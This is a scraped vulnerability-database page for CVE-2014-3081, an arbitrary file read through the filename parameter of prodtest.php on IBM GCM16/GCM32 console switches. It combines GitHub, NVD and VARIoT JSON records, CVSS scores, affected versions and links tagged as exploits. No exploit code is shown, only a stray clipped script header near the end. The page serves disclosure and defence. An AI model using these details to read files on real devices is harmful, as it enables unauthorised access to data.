        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "IBM GCM16 and  GCM32 Global Console Manager Switch firmware  prodtest.php Vulnerable to reading arbitrary files",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      }
    ],
    "trust": 0.6
  }
}

GHSA-2XJR-P7RW-GJM7

Vulnerability from github – Published: 2022-05-17 01:25 – Updated: 2025-04-12 12:36

Details

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter.

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2014-3081"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-08-17T23:55:00Z",
    "severity": "MODERATE"
  },
  "details": "prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter.",
  "id": "GHSA-2xjr-p7rw-gjm7",
  "modified": "2025-04-12T12:36:39Z",
  "published": "2022-05-17T01:25:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3081"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93930"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
    },
    {
      "type": "WEB",
      "url": "http://www.exploit-db.com/exploits/34132"
    },
    {
      "type": "WEB",
      "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

FKIE_CVE-2014-3081

Vulnerability from fkie_nvd - Published: 2014-08-17 23:55 - Updated: 2025-04-12 10:46

Severity ?

Summary

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter.

References

URL	Tags
psirt@us.ibm.com	http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html	Exploit
psirt@us.ibm.com	http://seclists.org/fulldisclosure/2014/Jul/113
psirt@us.ibm.com	http://www.exploit-db.com/exploits/34132/	Exploit
psirt@us.ibm.com	http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983	Vendor Advisory
psirt@us.ibm.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/93930
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2014/Jul/113
af854a3a-2127-422b-91ae-364da2661108	http://www.exploit-db.com/exploits/34132/	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/93930

Impacted products

	Vendor	Product	Version
	ibm	global_console_manager_16_firmware	*
	ibm	global_console_manager_32_firmware	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:global_console_manager_16_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A20A7D6-73FB-4E05-9D73-C23E20513AE5",
              "versionEndIncluding": "1.20.0.22575",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:global_console_manager_32_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "40D05CCE-C686-4D08-B4FE-B5C02DFA5EE3",
              "versionEndIncluding": "1.20.0.22575",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter."
    },
    {
      "lang": "es",
      "value": "prodtest.php en los switches IBM GCM16 y GCM32 Global Console Manager con firmware anterior a 1.20.20.23447 permite a usuarios remotos autenticados leer ficheros arbitrarios a trav\u00e9s del par\u00e1metro filename."
    }
  ],
  "id": "CVE-2014-3081",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 6.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:S/C:C/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-08-17T23:55:06.887",
  "references": [
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
    },
    {
      "source": "psirt@us.ibm.com",
      "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/34132/"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
    },
    {
      "source": "psirt@us.ibm.com",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93930"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/34132/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93930"
    }
  ],
  "sourceIdentifier": "psirt@us.ibm.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2014-3081 (GCVE-0-2014-3081)

GSD-2014-3081

VAR-201408-0280

!/usr/bin/python"""

--

GHSA-2XJR-P7RW-GJM7

FKIE_CVE-2014-3081

Tags

Sightings

Nomenclature